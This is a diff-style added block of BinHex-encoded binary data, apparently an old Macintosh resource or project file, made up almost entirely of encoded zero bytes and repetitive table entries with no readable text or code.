+!!!%!!!!!!!!!!!F!!93!!!'"!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!
+!!!!(!!&9!!!"JJ)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"`!"9J!
+!!B-#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!9F!!!'%!J%!!!!
+!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!(!!&B!!!"K3)"!!!!!!!"!!%"!!!
+!!!!!!!!!!!!!!3!!!!!!!!!!"`!"@3!!!BB#!3!!!!!!!3!"!3!!!!!!!!!!!!!
+!!!%!!!!!!!!!!!F!!9S!!!'(!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!
+!!!!(!!&E!!!"L!)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"`!"A!!
+!!BN#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!9d!!!'+!J%!!!!
+!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!(!!&H!!!"L`)"!!!!!!!"!!%"!!!
+!!!!!!!!!!!!!!3!!!!!!!!!!"`!"A`!!!B`#!3!!!!!!!3!"!3!!!!!!!!!!!!!
+!!!%!!!!!!!!!!!F!!@!!!!'0!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!
+!!!!(!!&K!!!"MJ)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"`!"BJ!
+!!Bm#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!@-!!!'3!!)"!!!
+!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"`!"C!!!!C%#!3!!!!!!!3!"!3!
+!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!@8!!!'5!J%!!!!!!!%!!3%!!!!!!!!!!!!
+!!!!"!!!!!!!!!!!(!!&Q!!!"N`)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!
+!!!!!"`!"C`!!!C3#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!@J
+!!!'9!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!(!!&T!!!"PJ)"!!!
+!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"`!"DJ!!!CF#!3!!!!!!!3!"!3!
+!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!@X!!!'B!J%!!!!!!!%!!3%!!!!!!!!!!!!
+!!!!"!!!!!!!!!!!(!!&X!!!"Q3)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!
+!!!!!"`!"E3!!!CS#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!@i
+!!!'E!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!(!!&[!!!"R!)"!!!
+!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!"`!"F!!!!Cd#!3!!!!!!!3!"!3!
+!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!A%!!!'H!J%!!!!!!!%!!3%!!!!!!!!!!!!
+!!!!"!!!!!!!!!!!(!!&b!!!"R`)"!!!!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!
+!!!!!"`!"F`!!!D3#!3!!!!!!!3!"!3!!!!!!!!!!!!!!!!%!!!!!!!!!!!F!!A3
+!!!'Q!J%!!!!!!!%!!3%!!!!!!!!!!!!!!!!"!!!!!!!!!!!(!!&e!!!"T`)"!!!
+!!!!"!!%"!!!!!!!!!!!!!!!!!3!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3!!!!)
+!!!!$!!!!"!!!!!8!!!!'!!!!"`!!!!J!!!!*!!!!#J!!!!X!!!!-!!!!$3!!!!i
+!!!!2!!!!%!!!!"%!!!!5!!!!%`!!!"3!!!!9!!!!&J!!!"F!!!!B!!!!'3!!!"S
+!!!!E!!!!(!!!!"d!!!!H!!!!(`!!!#!!!!!K!!!!)J!!!#-!!!!N!!!!*3!!!#B
+!!!!R!!!!+!!!!#N!!!!U!!!!+`!!!#`!!!!Y!!!!,J!!!#m!!!!`!!!!-3!!!$)
+!!!!c!!!!0!!!!$8!!!!f!!!!0`!!!$J!!!!j!!!!1J!!!$X!!!!m!!!!23!!!$i
+!!!!r!!!!3!!!!%%!!!"#!!!!3`!!!%3!!!"&!!!!4J!!!%F!!!")!!!!53!!!%S
+!!!",!!!!6!!!!%d!!!"1!!!!6`!!!&!!!!"4!!!!8J!!!&-!!!"8!!!!93!!!&B
+!!!"A!!!!@!!!!&N!!!"D!!!!@`!!!&`!!!"G!!!!AJ!!!&m!!!"J!!!!B3!!!')
+!!!"M!!!!C!!!!'8!!!"Q!!!!C`!!!'J!!!"T!!!!DJ!!!'X!!!"X!!!!E3!!!'i
+!!!"[!!!!F!!!!(%!!!"b!!!!F`!!!(3!!!"e!!!!GJ!!!(F!!!"i!!!!H3!!!(S
+!!!"l!!!!I!!!!(d!!!"q!!!!I`!!!)!!!!#"!!!!JJ!!!)-!!!#%!!!!K3!!!)B
+!!!#(!!!!L!!!!)N!!!#+!!!!L`!!!)`!!!#0!!!!MJ!!!)m!!!#3!!!!!*%!!!#
+5!!!!N`!!!*3!!!#9!!!!PJ!!!*F!!!#B!!!!Q3!!!*S!!!#E!!!!R!!!!*d!!!#
+H!!!!R`!!!+!!!!#K!!!!SJ!!!+-!!!#N!!!!T3!!!+B!!!#R!!!!U!!!!+N!!!#
+U!!!!U`!!!+`!!!#Y!!!!VJ!!!+m!!!#`!!!!X3!!!,)!!!#c!!!!Y!!!!,8!!!#
+f!!!!Y`!!!,J!!!#j!!!!ZJ!!!,X!!!#m!!!![3!!!,i!!!#r!!!!`!!!!-%!!!$
+#!!!!``!!!-3!!!$&!!!!aJ!!!-F!!!$)!!!!b3!!!-S!!!$,!!!!c!!!!-d!!!$
+1!!!!c`!!!0!!!!$4!!!!dJ!!!0-!!!$8!!!!e3!!!0B!!!$A!!!!f!!!!0N!!!$
+D!!!!f`!!!0`!!!$G!!!!hJ!!!0m!!!$J!!!!i3!!!1)!!!$M!!!!j!!!!18!!!$
+Q!!!!j`!!!1J!!!$T!!!!kJ!!!1X!!!$X!!!!l3!!!1i!!!$[!!!!m!!!!2%!!!$
+b!!!!m`!!!23!!!$e!!!!pJ!!!2F!!!$i!!!!q3!!!2S!!!$l!!!!r!!!!2d!!!$
+q!!!!r`!!!3!!!!%"!!!"!J!!!3-!!!%%!!!""3!!!3B!!!%(!!!"#!!!!3N!!!%
++!!!"#`!!!3`!!!%0!!!"$J!!!3m!!!%3!!!"%3!!!4)!!!%6!!!"&!!!!48!!!%
+@!!!"&`!!!4J!!!%C!!!"'J!!!4X!!!%F!!!"(3!!!4i!!!%I!!!")!!!!5%!!!%
+L!!!")`!!!53!!!%P!!!"*J!!!5F!!!%S!!!"+3!!!5S!!!%V!!!",!!!!5d!!!%
+Z!!!",`!!!6!!!!%a!!!"-J!!!6-!!!%d!!!"03!!!6B!!!%h!!!"1!!!!6N!!!%
+k!!!"1`!!!6`!!!%p!!!"2J!!!6m!!!&!!!!"33!!!8)!!!&$!!!"4!!!!88!!!&
+'!!!"4`!!!8J!!!&*!!!"5J!!!8X!!!&-!!!"63!!!8i!!!&2!!!"8!!!!9%!!!&
+5!!!"8`!!!93!!!&9!!!"9J!!!9F!!!&B!!!"@3!!!9S!!!&E!!!"A!!!!9d!!!&
+H!!!"A`!!!@!!!!&K!!!"BJ!!!@-!!!&N!!!"C3!!!@B!!!&R!!!"D!!!!@N!!!&
+U!!!"D`!!!@`!!!&Y!!!"EJ!!!@m!!!&`!!!"F3!!!A)!!!&c!!!"G!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"G3!!!B!(!!!
+!"`!"G3F!!!%(!!!#"`!!!`F!!!3(!!!&"`!!"JF!!!F(!!!)"`!!#3F!!!S(!!!
+,"`!!$!F!!!d(!!!1"`!!$`F!!"!(!!!4"`!!%JF!!"-(!!!8"`!!&3F!!"B(!!!
+A"`!!'!F!!"N(!!!D"`!!'`F!!"`(!!!G"`!!(JF!!"m(!!!J"`!!)3F!!#)(!!!
+M"`!!*!F!!#8(!!!Q"`!!*`F!!#J(!!!T"`!!+JF!!#X(!!!X"`!!,3F!!#i(!!!
+["`!!-!F!!$%(!!!b"`!!-`F!!$3(!!!e"`!!0JF!!$F(!!!i"`!!13F!!$S(!!!
+l"`!!2!F!!$d(!!!q"`!!2`F!!%!(!!"""`!!3JF!!%-(!!"%"`!!43F!!%B(!!"
+("`!!5!F!!%N(!!"+"`!!5`F!!%`(!!"0"`!!6JF!!%m(!!"3"`!!83F!!&)(!!"
+6"`!!9!F!!&8(!!"@"`!!9`F!!&J(!!"C"`!!@JF!!&X(!!"F"`!!A3F!!&i(!!"
+I"`!!B!F!!'%(!!"L"`!"G!F!!'-(!!"N"`!!C3F!!'B(!!"R"`!!D!F!!'N(!!"
+U"`!!D`F!!'`(!!"Y"`!!EJF!!'m(!!"`"`!!F3F!!()(!!"c"`!!G!F!!(8(!!"
+f"`!!G`F!!(J(!!"j"`!!HJF!!(X(!!"m"`!!I3F!!(i(!!"r"`!!J!F!!)%(!!#
+#"`!!J`F!!)3(!!#&"`!!KJF!!)F(!!#)"`!!L3F!!)S(!!#,"`!!M!F!!)d(!!#
+1"`!!M`F!!*!!"`!!N3F!!*)(!!#6"`!!P!F!!*8(!!#@"`!!P`F!!*J(!!#C"`!
+!QJF!!*X(!!#F"`!!R3F!!*i(!!#I"`!!S!F!!+%(!!#L"`!!S`F!!+3(!!#P"`!
+!TJF!!+F(!!#S"`!!U3F!!+S(!!#V"`!!V!F!!+d(!!#Z"`!!V`F!!,!(!!#a"`!
+!XJF!!,-(!!#d"`!!Y3F!!,B(!!#h"`!!Z!F!!,N(!!#k"`!!Z`F!!,`(!!#p"`!
+![JF!!,m(!!$!"`!!`3F!!-)(!!$$"`!!a!F!!-8(!!$'"`!!a`F!!-J(!!$*"`!
+!bJF!!-X(!!$-"`!!c3F!!-i(!!$2"`!!d!F!!0%(!!$5"`!!d`F!!03(!!$9"`!
+!eJF!!0F(!!$B"`!!f3F!!0S(!!$E"`!!h!F!!0d(!!$H"`!!h`F!!1!(!!$K"`!
+!iJF!!1-(!!$N"`!!j3F!!1B(!!$R"`!!k!F!!1N(!!$U"`!!k`F!!1`(!!$Y"`!
+!lJF!!1m(!!$`"`!!m3F!!2)(!!$c"`!!p!F!!28(!!$f"`!!p`F!!2J(!!$j"`!
+!qJF!!2X(!!$m"`!!r3F!!2i(!!$r"`!"!!F!!3%(!!%#"`!"!`F!!33(!!%&"`!
+""JF!!3F(!!%)"`!"#3F!!3S(!!&e"`!"#`F!!3`(!!%0"`!"$JF!!3m(!!%3"`!
+"%3F!!4)(!!%6"`!"&!F!!48(!!%@"`!"&`F!!4J(!!%C"`!"'JF!!4X(!!%F"`!
+"(3F!!4i(!!%I"`!")!F!!5%(!!%L"`!")`F!!53(!!%P"`!"*JF!!5F(!!%S"`!
+"+3F!!5S(!!%V"`!",!F!!5d(!!%Z"`!",`F!!6!(!!%a"`!"-JF!!6-(!!%d"`!
+"03F!!6B(!!%h"`!"1!F!!6N(!!%k"`!"1`F!!6`(!!%p"`!"2JF!!6m(!!&!"`!
+"33F!!8)(!!&$"`!"4!F!!88(!!&'"`!"4`F!!8J(!!&*"`!"5JF!!8X(!!&-"`!
+"63F!!8i(!!&2"`!"8!F!!9%(!!&5"`!"8`F!!93(!!&9"`!"9JF!!9F(!!&B"`!
+"@3F!!9S(!!&E"`!"A!F!!9d(!!&H"`!"A`F!!@!(!!&K"`!"BJF!!@-(!!&N"`!
+"C3F!!@B(!!&R"`!"D!F!!@N(!!&U"`!"D`F!!@`(!!&Y"`!"EJF!!@m(!!&`"`!
+"F3F!!A)(!!&c!!!"U3!"!#J!!!!!!jH9J!!!!!!!!(rr!!!"!!!!HF!!!J!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!,#2Z!!!!!!!!!"!!,#4r!!!J!!!!!
+!!!!!!!!#`MD!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!J!!!3!
+!!!!&!!"rr`!!!!"rr`!!!!"rr`!!!!"rr`!!!!`!!3!#!!B!!!!&3!!!#!!"!!%
+k!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3!!!2rrrrm
+!!!!$!!%!!6Sk!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+"!!!!rrrrr`!!!!3!!3!"1MTTEQ0XG@4P1J!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!$rrrrr3!!!!J!"!!%k!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!2rrrrp!!!!$!!%!!6Sk1NG98dNkD@jME(9NC6S
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!rrrrrd!!!!3!!3!"1MSk4e9656T
+XD@)k!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!$rrrrr3!!!"3!#!!%
+k6@&M6e-J8h9`F'pbG$S!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3!!!2rrrrp
+!!!!'!!)!!6T08d`k!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+"!!!!rrrrrd!!!!F!#J!!6@&M6e-J0MK,)%aTEQYPFJ!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
